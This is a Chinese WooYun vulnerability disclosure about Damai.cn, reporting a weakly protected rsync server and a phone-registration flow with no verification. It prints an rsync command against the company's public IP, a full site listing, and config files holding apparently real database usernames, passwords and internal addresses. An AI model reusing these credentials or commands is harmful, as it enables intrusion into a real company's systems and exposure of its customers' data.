当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094484

漏洞标题:大麦网某处敏感信息再次泄露(安全是动态的)

相关厂商:大麦网

漏洞作者: jaffer

提交时间:2015-01-29 10:43

修复时间:2015-02-03 10:44

公开时间:2015-02-03 10:44

漏洞类型:服务弱口令

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-29: 细节已通知厂商并且等待厂商处理中
2015-02-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt
用别人的手机注册,让别人无法注册。
大麦网敏感信息泄露外加一个可以用任何手机邮箱注册的漏洞

详细说明:

1、大麦网rsync服务器弱密码

rsync 58.83.157.187::website


drwxr-xr-x           0 2015/01/13 15:25:10 .
-rw-r--r-- 4144684 2014/04/24 11:06:30 mchannelcms.damai.cn.rar
-rw-r--r-- 4313299 2012/11/28 14:22:04 mm.rar
-rw-r--r-- 11 2011/10/27 16:10:44 nagiostest.htm
drwxr-xr-x 0 2014/12/09 15:15:59 163.m.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 AppMultiple.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:16 AppPlatforms.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 MobileValidate
drwxr-xr-x 0 2015/01/12 02:40:18 NewSh.piao.com.cn
drwxr-xr-x 0 2014/04/23 01:19:41 NewYear2012.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:19 Newother.piao.com.cn
drwxr-xr-x 0 2014/11/12 10:25:10 Piao2009Admin
drwxr-xr-x 0 2014/04/23 01:19:43 Pony.damai.cn
drwxr-xr-x 0 2012/05/31 17:19:19 admin.piao.com.cn90
drwxr-xr-x 0 2014/04/23 01:19:43 admin.piao.com.cn91
drwxr-xr-x 0 2014/10/31 21:13:37 alipay.m.damai.cn
drwxr-xr-x 0 2014/04/23 01:19:41 alladmin
drwxr-xr-x 0 2015/01/12 02:40:16 anti.damai.cn
drwxr-xr-x 0 2012/05/28 15:26:40 api.flash.damai.cn
drwxr-xr-x 0 2014/12/03 01:59:54 api.movie.damai.cn
drwxr-xr-x 0 2014/04/23 01:19:41 api.scorecenter.damai.cn
drwxr-xr-x 0 2014/12/09 10:50:39 banka.damai.cn
drwxr-xr-x 0 2012/05/28 15:12:19 biz.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:19 bj.piao.com.cn
drwxr-xr-x 0 2012/05/31 17:28:31 bus.piao.com.cn
drwxr-xr-x 0 2014/06/17 21:45:42 cd_en_piao
drwxr-xr-x 0 2013/01/15 20:17:28 cdadmin.piao.com.cn
drwxr-xr-x 0 2011/10/27 16:13:15 city.piao.com.cn
drwxr-xr-x 0 2014/04/23 01:19:41 classical.damai.cn
drwxr-xr-x 0 2014/09/15 11:09:31 cmb.m.damai.cn
drwxr-xr-x 0 2014/04/23 01:19:41 cms.damai.cn
drwxr-xr-x 0 2015/01/20 23:46:33 cms1.damai.cn
drwxr-xr-x 0 2011/10/27 16:13:31 cooper
drwxr-xr-x 0 2014/04/23 01:19:41 cp.piao.cn
drwxr-xr-x 0 2015/01/12 02:40:17 cpe.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 cpgateway.piao.com.cn
drwxr-xr-x 0 2015/01/12 02:40:20 d.damai.cn
drwxr-xr-x 0 2011/10/27 16:14:33 damai.95516.net
drwxr-xr-x 0 2015/01/08 21:34:12 damaisdk_data
drwxr-xr-x 0 2012/11/20 21:13:18 dianjiang.damai.cn
drwxr-xr-x 0 2012/05/31 19:48:46 dianjiang1.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 dianjiang2.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 diy.damai.cn
drwxr-xr-x 0 2012/06/02 23:26:39 djmanage.damai.cn
drwxr-xr-x 0 2012/06/02 23:26:39 djmanage1.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:16 djmanage2.damai.cn
drwxr-xr-x 0 2014/04/23 01:19:41 drama.damai.cn
drwxr-xr-x 0 2014/07/02 21:59:40 e.damai.cn
drwxr-xr-x 0 2012/06/14 19:38:17 e1.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 edm.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:19 en.piao.com.cn
drwxr-xr-x 0 2014/10/31 00:13:55 en_piao
drwxr-xr-x 0 2015/01/12 02:40:16 enmanage.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 ewallet
drwxr-xr-x 0 2015/01/12 02:40:19 fansaction.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 fenghuang.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:20 global.damai.cn
drwxr-xr-x 0 2014/10/31 00:17:45 gz_en_piao
drwxr-xr-x 0 2013/06/04 17:38:08 gzadmin.piao.com.cn
drwxr-xr-x 0 2013/07/01 10:23:21 gznews.piao.com.cn
drwxr-xr-x 0 2014/05/22 10:06:18 i.damai.cn
drwxr-xr-x 0 2013/08/27 18:24:34 jf.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:19 jp_piao
drwxr-xr-x 0 2014/10/30 20:08:06 kids.damai.cn
drwxr-xr-x 0 2011/09/05 14:02:08 kr_piao
drwxr-xr-x 0 2014/04/23 01:19:41 live.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:19 lycprogramorderdeal
drwxr-xr-x 0 2015/01/20 16:50:59 m.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 mai.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 manti.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 mapi.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:19 mark.damai.cn
drwxr-xr-x 0 2014/04/23 01:19:41 matix.net
drwxr-xr-x 0 2015/01/12 02:40:18 mayday3d.damai.cn
drwxr-xr-x 0 2014/04/23 01:19:42 mball.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 mbanka.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 mchannelcms.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:19 mdianying.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:19 mdrama.damai.cn
drwxr-xr-x 0 2014/04/23 01:19:43 metasearch.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 mjf.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 mmessage.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:16 mmovie.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:19 mmsg.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:19 mnews.damai.cn
drwxr-xr-x 0 2014/04/23 01:19:41 mobile.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 mobileapi.damai.cn
drwxr-xr-x 0 2014/12/03 01:09:43 movie.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 moviesite
drwxr-xr-x 0 2014/03/06 21:13:04 moviex.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:20 mpay.damai.cn
drwxr-xr-x 0 2014/11/27 09:23:57 mperform.damai.cn
drwxr-xr-x 0 2015/01/15 09:53:35 mperform1.damai.cn
drwxr-xr-x 0 2012/10/25 23:50:12 mperfrom.damai.cn
drwxr-xr-x 0 2014/04/23 01:19:41 mpopup.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 mprivilege.damai.cn
drwxr-xr-x 0 2014/04/23 01:19:44 mqa.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:20 mrock.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 mscore.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 mshop.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 mshoping.damai.cn
drwxr-xr-x 0 2014/01/14 12:17:07 msubcenter.damai.cn
drwxr-xr-x 0 2014/04/23 01:19:48 msuperticket.damai.cn
drwxr-xr-x 0 2015/01/27 17:46:51 mtang.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:20 mtravel.damai.cn
drwxr-xr-x 0 2014/11/06 20:36:36 muserdata.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 mvenue.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 mwarn.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 news.damai.cn
drwxr-xr-x 0 2012/07/02 11:08:57 news.piao.com.cn
drwxr-xr-x 0 2015/01/12 02:40:19 nothingSite
drwxr-xr-x 0 2015/01/12 02:40:20 npapi.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 open.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:19 page.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:19 paytemp.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 per
drwxr-xr-x 0 2014/01/14 12:18:03 permmovie.damai.cn
drwxr-xr-x 0 2014/12/25 23:21:53 permovie.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 psm.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 qinz.damai.cn
drwxr-xr-x 0 2014/03/06 21:13:14 rock.damai.cn
drwxr-xr-x 0 2014/10/30 22:10:40 s.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 sadmin.damai.cn
drwxr-xr-x 0 2012/06/02 23:29:40 sadmin.piao.com.cn
drwxr-xr-x 0 2014/12/09 15:39:01 sale.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 sbuy.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 seoee
drwxr-xr-x 0 2011/08/31 03:13:31 sh.piao.com.cn
drwxr-xr-x 0 2011/09/05 14:05:45 sh.piao.com.cn90
drwxr-xr-x 0 2013/08/09 11:24:37 sh_en_piao
drwxr-xr-x 0 2011/10/27 16:46:08 shnews.piao.com.cn
drwxr-xr-x 0 2015/01/12 02:40:20 sina.damai.cn
drwxr-xr-x 0 2014/10/31 08:37:16 sinabuy.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 sseat.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:20 super.damai.cn
drwxr-xr-x 0 2014/04/23 01:19:46 superticket.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 t.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 tang.damai.cn
drwxr-xr-x 0 2014/04/23 01:19:43 train.piao.com.cn
drwxr-xr-x 0 2015/01/12 02:40:18 travel.damai.cn
drwxr-xr-x 0 2014/03/13 15:19:55 traveloff.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:16 union.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:20 unioncms.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 venue.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:19 wangzhanhoutai2009.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 wap.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 wr.piao.com.cn
drwxr-xr-x 0 2015/01/12 02:40:20 www.3721inn.com
drwxr-xr-x 0 2015/01/12 02:40:19 www.baotoo.com
drwxr-xr-x 0 2015/01/12 02:40:18 www.czslyydd.com
drwxr-xr-x 0 2015/01/12 02:40:17 www.maikr.com
drwxr-xr-x 0 2015/01/12 02:40:17 www.maitix.com
drwxr-xr-x 0 2011/09/05 14:54:57 www.piao.com.cn
drwxr-xr-x 0 2015/01/12 02:40:19 zdj.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:17 zhaopin.damai.cn
drwxr-xr-x 0 2015/01/12 02:40:18 zzj.damai.cn


因为看大麦网官网有些是aspx,所以认为这可能是一些旧的网站备份。
但是里面还是有很多敏感信息。主要集中在Web.config,以及一些链接数据库的asp文件上。
完全可以下载。
比如:ContoDb.asp文件。

function OpenConn(sitename)
if sitename="" then response.Write "OpenConn(sitename) 参数为空":response.Redirect "login.asp":response.End()

dim constr
constr=""
constr = "driver={sql server};server=192.168.68.175;database=newoldpiaodb;UID=piao2008;PWD=newpiao2008!@#"
domain = "www.piao.com.cn"
if sitename="44" then
domain = "tj.piao.com.cn"
session("sitename")="天津"
end if
if sitename="24" then
domain = "xa.piao.com.cn"
session("sitename")="西安"
end if
if sitename="42" then
domain = "cs.piao.com.cn"
session("sitename")="长沙"
end if
if sitename="27" then
domain = "cd.piao.com.cn"
session("sitename")="成都"
end if
if sitename="28" then
domain = "cq.piao.com.cn"
session("sitename")="重庆"
end if
if sitename="46" then
domain = "suz.piao.com.cn"
session("sitename")="苏州"
end if

if sitename="15" then
domain = "nj.piao.com.cn"
session("sitename")="南京"
end if

if sitename="34" then
domain = "km.piao.com.cn"
session("sitename")="昆明"
end if

if sitename="50" then
domain = "gy.piao.com.cn"
session("sitename")="贵阳"
end if

if sitename="31" then
domain = "sz.piao.com.cn"
session("sitename")="深圳"
end if

if sitename="4" then
domain = "gz.piao.com.cn"
session("sitename")="广州"
end if

if sitename="26" then
domain = "hz.piao.com.cn"
session("sitename")="杭州"
end if

if sitename="5" then
domain = "sh.piao.com.cn"
session("sitename")="上海"
end if

if sitename="city" then
domain = "city.piao.com.cn"
session("sitename")="全国"
constr="driver={sql server};server=220.181.68.175;database=city_piao_db;UID=piao_citys_site;PWD=site!))01"
end if

dim seoconn
set seoconn=server.CreateObject("adodb.connection")
response.write constr
seoconn.open constr

if err.number>0 then
response.Write "打开数据库失败"
response.End()
end if

set OpenConn = seoconn
end function


里面就包含了一些数据库用户名密码。尝试去同步,发现不成功,IP地址220.181.68.175也ping不通。
Web.config里面的一些敏感内容如下:

<configSections>
<section name="voosay.controller" type="Voosay.Web.Framework.ControllerSection, Voosay.Web, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" allowLocation="true" allowDefinition="Everywhere" allowExeDefinition="MachineToApplication" overrideModeDefault="Allow" restartOnExternalChanges="true" requirePermission="true" />
</configSections>
<!-- voosay.controller节点用于指定页面表现层所在的程序集,以及名称空间 -->
<voosay.controller assembly="App.Controller, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" namespace="App.Controller.Pages" />
<appSettings>
<add key="ImgServer" value="http://pimg.damai.cn/"/>
<add key="changan_venueid" value="69"/>
<add key="need_devide_maitix" value="10009" />
<add key="ippath" value="|APPBASE|IP_Data\QQWry.Dat"/>
<add key="xmlpath" value="D:\work\website\AppPlatforms.damai.cn\View\Manage\ChangAn\Excel\" />
<add key="vendorIdMSG" value="5" />
<add key="passwordMSG" value="piaowu_cupclub" />
<add key="vendorId" value="000000000000033" />
<add key="password" value="cum211.144.139.186" />
<add key="Memcached_ServerList" value="192.168.68.144:11211" />
<add key="MongDB-thirdPiao" value="server=192.168.68.144:10144"/>
<add key="damaisdk" value="system=third_universal;sess-timeout=30;log-out=logs;"/>
<add key="LiveConnectionString" value="Data Source=192.168.68.161\SQLpointA,14330;Initial Catalog=piao_3.0;User ID=Piao_3.0_owner;Password=bEEv@#$fghcx12" />
<add key="BJMatixConnectionString" value="Data source=192.168.68.161\SQLpointA,14330;Initial Catalog=PiaoCenterDB;User ID=PiaoCenterDB_owner;Password=45GG6f!!@@$$^d;Connect Timeout=60000" />
<add key="SHMatixConnectionString" value="Data Source=192.168.68.161\SQLpointA,14330;Initial Catalog=SH_PiaoCenterDB;User ID=SH_PiaoCenterDB_owner;Password=xcBBv1!@#%^20;Connect Timeout=60000" />
<add key="GZMatixConnectionString" value="Data Source=192.168.68.161\SQLpointA,14330;Initial Catalog=GZ_PiaoCenterDB;User ID=GZ_PiaoCenterDB_owner;Password=kuyDD)(*^%t46;Connect Timeout=60000" />
</appSettings>
<connectionStrings>
<add name="BJMatix" connectionString="Data source=192.168.68.161\SQLpointA,14330;Initial Catalog=PiaoCenterDB;User ID=PiaoCenterDB_owner;Password=45GG6f!!@@$$^d;Connect Timeout=60000" providerName="System.Data.SqlClient"/>
<add name="shopping" connectionString="Data Source=192.168.68.162\SQLpointB,14332;Initial Catalog=Shopping;User ID=shopping_owner;Password=45R6nFF#$%dfggf;Connect Timeout=60000" providerName="System.Data.SqlClient"/>
<add name="crm" connectionString="packet size=8192;user id=CRM_owner;password=ytr(DD)F%$#!789;data source=192.168.68.162\SQLpointB,14332;persist security info=false;initial catalog=CRM;Connect Timeout=120" providerName="System.Data.SqlClient" />
<add name="AppPlatforms" connectionString="Data Source=192.168.68.162\SQLpointB,14332;database=cp;uid=CP_owner;pwd=))NVN((*$002YUY" providerName="System.Data.SqlClient" />
<add name="kaixin" connectionString="Data Source=192.168.68.163\SQL2008,14332;user id=kaixin_owner;password=J##$$@@KL456;database=kaixin;" providerName="System.Data.SqlClient"/>
<add name="AppPlatforms_old" connectionString="Data Source=192.168.68.163\SQL2008,14332;user id=ChinaPay_owner;password=FFDSD!@#GHLK;database=ChinaPay;" providerName="System.Data.SqlClient"/>
</connectionStrings>
<system.web>


很多内网的数据库的密码用户之类的。
里面还有很多组件之类的。东西实在是太多了。
可以挖掘的东西也是太多了。
2 一个可以注册完所有手机和email的漏洞
域:cmb.damai.cn:这个域下面也特别有趣。
用户如果没有在这个域下登陆,就会被要求登陆,或者注册。注册页面:
http://cmb.m.damai.cn/reg.aspx?from=userinfo.aspx
注册界面是这样的。

11.png


直接输入手机号码就可以注册好嘛。不需要任何验证。而且这个域下注册的账号在其他域下是通用的,注册过的不能再注册了。那我可以干什么??我可以立马将所有手机号码都注册一个大麦网,这样持有这个号码的用户就不能再注册大麦网了。我可以变相将所有没注册大麦网的用户都注册了,让他们不能注册。

漏洞证明:

12.png


任意手机注册那个可以现场注册。

修复方案:

1、rsync服务器权限控制
2、建议安全人员对大麦网旗下所有的域进行安全检查。凭感觉,很多域下问题很多,静待挖掘。偶
3、没进行安全检查的域不要上线。

版权声明:转载请注明来源 jaffer@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-03 10:44

厂商回复:

漏洞Rank:13 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-29 10:45 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    处理过的问题,莫名其妙在同一个地方又出现了,安全确实是动态的

  2. 2015-02-03 13:57 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    居然忽略。。。乌云爱心补rank